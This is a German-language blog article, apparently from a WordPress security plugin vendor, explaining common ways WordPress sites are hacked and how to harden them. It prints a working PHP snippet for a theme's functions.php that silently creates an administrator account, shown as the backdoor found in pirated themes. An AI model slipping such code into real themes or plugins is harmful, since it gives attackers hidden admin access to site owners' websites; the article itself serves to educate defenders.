Bevor wir Ihnen zeigen, wie und warum Hacker Websites hacken, müssen Sie die Struktur Ihrer WordPress-Website verstehen. Sie setzt sich aus Dateien und einer Datenbank zusammen. Die WordPress-Dateien enthalten meist alle Einstellungen und Konfigurationen, während die Datenbank alle Daten von Beiträgen, Kommentaren, Benutzern und vielem mehr speichert.
Beide Elemente sind erforderlich, um das Frontend Ihrer Website zu erstellen. Aber beide können auch von Hackern ausgenutzt werden.
Zunächst wollen wir einen Blick darauf werfen, wie Hacker in WordPress-Websites eindringen.
Hinweis: Dies ist keine Anleitung, wie man eine WordPress-Website hackt. Es ist ein lehrreicher Artikel, der Ihnen zeigt, wie Hacker Schwachstellen ausnutzen können, um Ihre Website zu hacken. Fangen wir also an.
6 häufige Schwachstellen, die es Hackern ermöglichen, WordPress-Seiten zu hacken
Um eine Website zu hacken, sollte sie eine Schwachstelle haben. Wir haben die häufigsten Schwachstellen aufgelistet, die in WordPress-Websites gefunden wurden:
Veraltete WordPress-Installation
Rund 44 % der gehackten WordPress-Websites liefen laut einem Bericht aus dem Jahr 2018 auf veralteten Installationen. Als Website-Besitzer werden Sie sehen, dass häufige Updates für die WordPress-Installation verfügbar sind, wie zum Beispiel:
In der Regel enthalten Updates neue Funktionen, Fehlerbehebungen oder beheben Inkompatibilitätsprobleme. Manchmal enthalten sie auch Sicherheitspatches für WordPress. Das heißt, wenn eine Sicherheitslücke in der Software gefunden wurde, beheben die Entwickler diese schnell und veröffentlichen ein Update, das die Schwachstelle beseitigt.
Nach der Veröffentlichung wird das Vorhandensein einer wp-Sicherheitslücke der Öffentlichkeit bekannt gemacht. Hacker suchen dann nach Websites, die nicht aktualisiert wurden, finden die Schwachstelle und nutzen sie, um sich in die Website einzuhacken.
Wenn Sie sich also dafür entscheiden, Ihre WordPress-Installation nicht zu aktualisieren, haben Sie die neuen Sicherheitsfunktionen nicht installiert und den Hackern Ihre Website auf dem Silbertablett serviert.
Achten Sie darauf, dass Ihre WordPress-Website immer auf dem neuesten Stand ist.
Tipp: Sicherheitspatches werden als kleinere Updates herausgegeben. Ob es sich um ein größeres Update handelt, erkennen Sie daran, dass es V5.2 oder V5.3 ist. Ein Minor-Update wäre zum Beispiel V5.2.1. Standardmäßig werden kleinere Aktualisierungen automatisch durchgeführt, aber Sie können diese Funktion auch deaktivieren. Wir empfehlen, die Option „Automatische Updates“ für kleinere Updates aktiviert zu lassen.
Neben der Aktualisierung Ihrer Plugins, Themes und des Kerns empfehlen wir Ihnen dringend, Ihre WordPress-Salts und Sicherheitsschlüssel auf dem neuesten Stand zu halten.
Nutzung schwacher Anmeldedaten
Ein weiterer häufiger Einstiegspunkt für Hacker sind schwache Anmeldedaten. Hacker verwenden eine Methode namens Brute-Force-Angriffe, bei der sie Bots so programmieren, dass sie nach WordPress-Sites im Internet suchen und verschiedene Kombinationen von Benutzernamen und Kennwörtern ausprobieren, um in die Website einzudringen.
Wenn Sie Ihren Anmeldenamen als „admin“ angegeben haben, sind sie bereits einen Schritt weiter, um Zugang zu Ihrer Website zu erhalten. Wenn Sie jedoch gängige Passwörter wie „password123“ verwendet haben, ist es für sie ein Leichtes, diese zu erraten. Diese Bots können in nur einer Sekunde Tausende, wenn nicht Millionen von Hacking-Versuchen unternehmen (empfohlene Lektüre – Leitfaden zum Schutz der WordPress-Anmeldeseite).
Wir empfehlen, das Passwort in eine Passphrase in Kombination mit Zahlen und Symbolen zu ändern, um Ihr Passwort so stark wie möglich zu machen:
Raubkopierte Themes installiert haben
Premium-Themes sind attraktiv und wir alle hätten gerne ein tolles Theme für unsere Website, um sie einzigartig zu machen. Oftmals fallen Website-Besitzer auf kostenlose, geknackte oder raubkopierte Versionen dieser Themes herein. Solche Themes aus unzuverlässigen Quellen können vorinstallierte Malware enthalten. Wenn Sie sie auf Ihrer WordPress-Website installieren, installieren Sie auch die Malware. Das öffnet Hackern Tür und Tor. Wie das geschieht, haben wir später ausführlich beschrieben.
Laden Sie Themes immer nur von seriösen Quellen wie dem WordPress-Repository oder Marktplätzen wie ThemeForest und ThemeTrust herunter.
Verwendung anfälliger Plugins
Hacker sind ständig auf der Suche nach Sicherheitslücken in Plugins. Wenn sie eine finden, durchsuchen sie das Internet nach WordPress-Seiten, auf denen das Plugin installiert ist. Auf diese Weise können sie sich innerhalb weniger Minuten in Tausende von Websites einhacken.
In vielen Fällen, insbesondere bei kostenlosen Plugins, stellen die Entwickler fest, dass sie das Plugin nicht mehr warten können und geben es auf. (Das kann auch bei Themes passieren). In diesen Fällen ist die Sicherheit des Plugins nicht mehr gewährleistet und die Installation auf Ihrer Website stellt eine Gefahr dar.
Laden Sie Plugins nur aus vertrauenswürdigen Quellen wie dem WordPress-Repository oder CodeCanyon herunter. Löschen Sie regelmäßig WordPress-Plugins und Themes, die Sie nicht mehr verwenden. Überprüfen Sie den Status der Plugins, die Sie verwenden, um zu sehen, ob sie vom Entwickler aktualisiert und gewartet werden.
Nutzung eines unsicheren lokalen Systems
Manchmal kann es sein, dass Ihr Computer selbst nicht sicher ist. Wenn sich jemand in Ihr System hackt, kann er leicht auf Ihre WordPress-Website zugreifen, da der wp-admin in den meisten Fällen bereits angemeldet und geöffnet ist.
Dies kann passieren, wenn Sie keine Firewall oder ein Anti-Malware-Tool auf Ihrem System installiert haben.
Es wird empfohlen, dass Sie niemals einen öffentlichen Computer oder eine öffentliche, ungesicherte WLAN-Verbindung auf Ihrem lokalen System verwenden, das Sie zum Betreiben Ihrer WordPress-Website nutzen. Halten Sie immer Malware-Erkennungs-Tools auf Ihrer Website aktiv.
Benutzen Sie einen schlechten Webhosting-Service
Bei der Auswahl eines Hosting-Angebots neigen wir dazu, nach dem billigsten zu suchen. Aber der billigste garantiert nicht immer gute Sicherheitsmaßnahmen.
Gemeinsame Server mögen billiger sein, aber sie gefährden auch Ihre Website. Sie können nicht wissen, mit welchen Websites Sie einen Webserver teilen und ob diese Sicherheitsprotokolle implementiert haben. Wenn sie gehackt werden, besteht die Möglichkeit, dass sich die Malware-Infektion auch auf Ihre Website ausbreitet.
Es kommt auch vor, dass Website-Hosts kompromittiert werden, was bedeutet, dass alle Websites auf der Hosting-Plattform für Hacker angreifbar sind.“
Bevor Sie sich für einen Web-Host entscheiden, sollten Sie lesen, was er anbietet und was Kunden über ihn sagen. Auf diese Weise können Sie sich ein gutes Bild davon machen, welchen Webhoster Sie wählen sollten.
Um eine verwundbare Website zu finden, erstellen Hacker ihre eigenen Bots oder verwenden kostenlos online verfügbare Schwachstellen-Scanner, um das Internet zu durchkämmen. Wenn sie eine gefunden haben, nutzen sie die Sicherheitslücke (wie die oben genannten) aus, um Zugriff auf die Dateien oder die Datenbank der WordPress-Website zu erhalten.
Dann injizieren sie Code, der bösartige Aktivitäten wie das Versenden von Spam-E-Mails, den Verkauf illegaler Produkte usw. ausführt. Sie injizieren auch Code, um neue Benutzerkonten oder WordPress-Hintertüren zu erstellen, mit denen sie jederzeit wieder Zugang zu Ihrer Website erhalten können.
Wie hackt man eine WordPress-Website?
Es gibt unzählige Möglichkeiten, eine WordPress-Website zu hacken. Hier besprechen wir zwei der häufigsten Wege, wie Hacker Code in Ihre Website einschleusen, um ein neues Benutzer-Login zu erstellen:
I. Über Dateien (vorinstallierte Malware in einem raubkopierten Theme)
Wie wir bereits besprochen haben, fallen viele WordPress-Site-Besitzer auf raubkopierte Themes herein. Sie erhalten alle Funktionen kostenlos! Aber solche Software kann ein Skript enthalten, das eine neue Anmelde-ID erstellt. Sobald Sie das Theme installiert haben, wird das neue Benutzerkonto erstellt, und der Hacker kann sich einfach über den WordPress-Admin in Ihre Website einloggen.
Wir zeigen Ihnen, wie Sie mithilfe Ihrer Theme-Datei ein neues Benutzerkonto auf Ihrer WordPress-Website erstellen können. Das wird Ihnen helfen zu verstehen, wie raubkopierte Themes einem Hacker helfen, Zugang zu Ihrer Website zu erhalten.
Tipp: Dies kann auch nützlich sein, wenn Sie aus Ihrem wp-admin ausgesperrt sind, aber immer noch Zugang zu Ihrem Webhosting-Konto haben.
Vorsicht:
Ein Blick hinter die Kulissen einer WordPress-Site ist eine riskante Angelegenheit. Es ist am besten, dies auf einer Test- oder Staging-Site zu tun. Wenn Sie sich dafür entscheiden, dies auf Ihrer Live-Site zu tun, stellen Sie bitte sicher, dass Sie ein zuverlässiges Backup erstellen. Falls etwas schief geht, können Sie Ihr WordPress-Backup wiederherstellen.
Schritt 1: Melden Sie sich bei Ihrem WordPress-Hosting-Konto an. Gehen Sie zum cPanel und greifen Sie auf den Dateimanager zu.
Sie können auch über einen FTP-Client wie FileZilla mit FTP-Zugangsdaten auf die Dateien zugreifen.
Schritt 2: Ihre WordPress-Dateien befinden sich normalerweise in einem Ordner namens public_html. Darin können Sie auf den Ordner wp_content/themes.
Schritt 3: Hier müssen Sie das aktive Theme auf Ihrer Website auswählen und die Datei functions.php bearbeiten.
Schritt 4: Kopieren Sie den folgenden Code und fügen Sie ihn am Ende der Datei ein. (Wenn ein abschließender Tag wie ?> vorhanden ist, stellen Sie sicher, dass der Code in der Zeile davor steht.)
$new_user_email = ‚[email protected]‘;
$new_user_password = ‚password‘;
if(!username_exists($new_user_email)) {
$user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);
wp_update_user(array(‚ID‘ => $user_id, ’nickname‘ => $new_user_email));
$user = new WP_User($user_id);
$user->set_role(‚administrator‘);
}
Ändern Sie in den ersten beiden Zeilen die E-Mail und das Passwort Ihrer Wahl. Sobald Sie die Datei speichern und Ihre Website öffnen, wird der Code ausgeführt und Sie können sich mit diesen neuen Anmeldedaten anmelden.
Wir hoffen, dass Sie jetzt verstehen, dass bei der Installation eines raubkopierten Themes, wenn es diesen Codeblock enthält, ein neues Benutzerkonto erstellt wird. Alles, was der Hacker tun muss, ist, die Anmeldedaten einzugeben und sich einzuloggen.
II. Über die Datenbank – SQL Injection
Dies ist ein weiterer der häufigsten Gründe, warum WordPress-Sites gehackt werden. Um zu beginnen, müssen Sie zwei Dinge über SQL-Injektionen wissen:
-
- WordPress verwendet MySQL als Standard-Datenbanksystem.
- Um das Frontend einer Website zu generieren, verwendet WordPress SQL-Abfragen, um Daten aus der Datenbank zu ziehen.
Wir müssen uns vorerst keine Gedanken darüber machen, was das ist oder wie es im Detail funktioniert. Was Sie wissen müssen, ist, dass diese Datenbank nur über cPanel > phpMyAdmin zugänglich ist. Aber Hacker finden Wege, um auf die Datenbank zuzugreifen, ohne cPanel zu benutzen. Einer der häufigsten Wege, wie Hacker mit der Datenbank einer Website in Kontakt kommen, sind anfällige Formulare auf einer Website.
Ein Formular ist ein beliebiges Element, in das Text eingegeben werden kann, z. B. die WordPress-Anmeldeleiste, das Kontaktformular, WordPress-Blog-Kommentare, Abonnement-Popups, Kassenseiten und die Suchleiste der Website.
Anstatt die im Formular abgefragten Daten einzugeben, würde der Hacker seine bösartigen SQL-Befehle eingeben. Da alle in das Formular eingegebenen Informationen in Ihrer Datenbank gespeichert werden, findet dieser bösartige Code seinen Weg hinein.
Um zu erklären, wie dies geschieht, zeigen wir Ihnen, wie Sie ein neues Benutzerkonto mit Ihrer Datenbank erstellen.
→ Neues Benutzerkonto über die Datenbank erstellen
Schritt 1: Greifen Sie auf das cPanel zu und öffnen Sie phpMyAdmin > Datenbanken.
Schritt 2: Hier sehen Sie eine Liste von Datenbanken. Sie müssen Ihre Datenbank auswählen. (Wenn Sie den Namen Ihrer Datenbank nicht kennen, können Sie diese Information in Ihrer wp-config-Datei herausfinden, etwa so).
Wir haben die Datenbank anhand des Namens in der wp-config-Datei ausgewählt.
Schritt 3: Als Nächstes müssen Sie unter den Tabellen, die auf der rechten Seite angezeigt werden, die Tabelle finden, die auf _users endet (sie wird höchstwahrscheinlich wp_users heißen).
Schritt 4: Hier können Sie auf ‚Einfügen‘ klicken.
Schritt 5: Es öffnet sich der folgende Bildschirm, in dem Sie den Benutzernamen, das Passwort, die E-Mail und den Anzeigenamen eingeben können.
Schritt 6: Klicken Sie anschließend auf „Go“ und Ihre Änderungen werden gespeichert. Jetzt können Sie sich mit den neuen Zugangsdaten bei WordPress anmelden.
Das Gleiche kann durch Einfügen eines SQL-Codeblocks in die Datenbank erreicht werden. Sobald der Code in die Datenbank eingegeben wird, wird er ausgeführt und ein neuer Benutzer wird erstellt. Man kann sich das so vorstellen, dass ein Hacker einfach seine eigene Tür in Ihrem Haus öffnet und hereinspaziert.
Wie kann man Hacker davon abhalten, Ihre Website zu hacken?
Es gibt vier Hauptschritte, die Sie unternehmen müssen, um Ihre Website so sicher zu machen, dass Hacker ferngehalten werden:
Installieren Sie ein WordPress-Sicherheits-Plugin
Jede WordPress-Website braucht ein Sicherheits-Plugin wie MalCare. Schützen Sie Ihre WordPress-Website mit einem solchen Plugin, das die Website regelmäßig scannt. Es erkennt jede verdächtige Aktivität, blockiert bösartigen Datenverkehr und hält Hacker fern. Sollte doch ein Hacker eindringen, werden Sie sofort gewarnt und können Ihre Website sofort säubern, bevor er Schaden anrichten kann.
Installieren Sie ein SSL-Zertifikat
Dieses Zertifikat verschlüsselt die Daten auf Ihrer Website. Das bedeutet, dass beim Besuch Ihrer Website Daten zwischen dem Computer des Besuchers und dem Server Ihrer Website übertragen werden.
Wenn die Daten im Klartext übertragen werden, können Hacker, die auf der Lauer liegen, diese Daten abgreifen. Sie können sie lesen, stehlen oder nach ihrem Geschmack verändern.
Wenn es aber verschlüsselt ist, kann ein Hacker es nicht entziffern.
Sie können ein SSL-Zertifikat von Ihrem Webhost oder einem SSL-Anbieter erhalten. Wenn Sie sich Sorgen machen, zu viel für ein Zertifikat auszugeben, bieten Anbieter wie LetsEncrypt kostenloses SSL an.
Wie Sie ein SSL-Zertifikat installieren, erfahren Sie in diesem Leitfaden – Umstellung von HTTP auf HTTPS.
Bekannte Schwachstellen beheben
Wie bereits erwähnt, gibt es häufige Schwachstellen in WordPress. Wir empfehlen Ihnen, die folgenden Maßnahmen zu ergreifen, um Schwachstellen zu minimieren.
-
- Die Aktualisierung von WordPress und seinen Themes und Plugins muss oberste Priorität haben.
- Stellen Sie sicher, dass Sie immer starke Anmeldeinformationen verwenden, um Brute-Forcing-Angriffe zu vermeiden.
- Löschen Sie regelmäßig unbenutzte Themes und Plugins
- Nutzen Sie niemals raubkopierte Themes und Plugins. Laden Sie solche Software immer von vertrauenswürdigen Quellen wie dem WordPress-Repository, CodeCanyon oder ThemeForest herunter.
- Benutzen Sie einen zuverlässigen Webhosting-Anbieter.
- Schützen Sie Ihren lokalen Computer durch die Installation von Anti-Malware-Software.
Härten Sie Ihre WordPress-Site
WordPress empfiehlt, dass jede Website auf seiner Plattform bestimmte Schritte unternimmt, um ihre Sites zu härten. Einige dieser Maßnahmen sind:
- Betreiben Sie eine aktive WordPress-Firewall. Dies hilft, die Anzahl der Anmeldeversuche zu begrenzen. Jeder Benutzer erhält nur drei Chancen, die Anmeldedaten richtig einzugeben, danach muss er sich für „Passwort vergessen“ entscheiden oder den Administrator kontaktieren. Für diesen Schritt können Sie dasselbe MalCare-Plugin verwenden.
- Deaktivieren von Plugin-Installationen, wenn mehrere Benutzer auf der Website arbeiten. Sie möchten sicherstellen, dass niemand ein Plugin frei installiert, ohne zu prüfen, ob er zuverlässig und vertrauenswürdig für Ihre Website ist. Dies kann manuell durch Bearbeiten der Datei wp-config.php in Ihrer WordPress-Installation erfolgen. Sie können dafür auch das MalCare-Plugin verwenden.
- Implementieren einer 2-Faktor-Authentifizierung, um die Person zu verifizieren, die sich anmeldet. Dazu wird ein Einmal-Passwort an das registrierte Mobiltelefon oder die E-Mail-Adresse gesendet, oder es werden Apps wie Google Authenticator verwendet, die alle 30 Sekunden ein Echtzeit-Passwort generieren.
Es gibt noch viele weitere Möglichkeiten, wie Sie Ihre Website absichern können. Es wird empfohlen, diese Schritte entsprechend den Anforderungen Ihrer Website zu implementieren.
Darüber hinaus können Sie einige weitere Sicherheitsmaßnahmen ergreifen. Wir empfehlen Ihnen dringend, diesen Leitfaden zu befolgen – Sichern Sie Ihre WordPress-Website mit wp-config.php.
Abschließende Überlegungen
Wir hoffen, dass dieser Artikel Ihnen ein besseres Verständnis dafür vermittelt hat, wie Schwachstellen auf Ihrer Website auftreten können und wie Hacker eindringen. Hacker sind nicht voreingenommen und haben es auf so gut wie jede Website abgesehen. Wenn Ihre Website verwundbar ist, ist die Wahrscheinlichkeit groß, dass Sie gehackt werden.
Zusammenfassend empfehlen wir also, Schwachstellen zu minimieren, ein Sicherheits-Plugin zu installieren und Ihre Website zu härten, damit Hacker keine Chance haben, in Ihre Website einzudringen.
Sichern Sie Ihre Website mit unserem MalCare Security Plugin!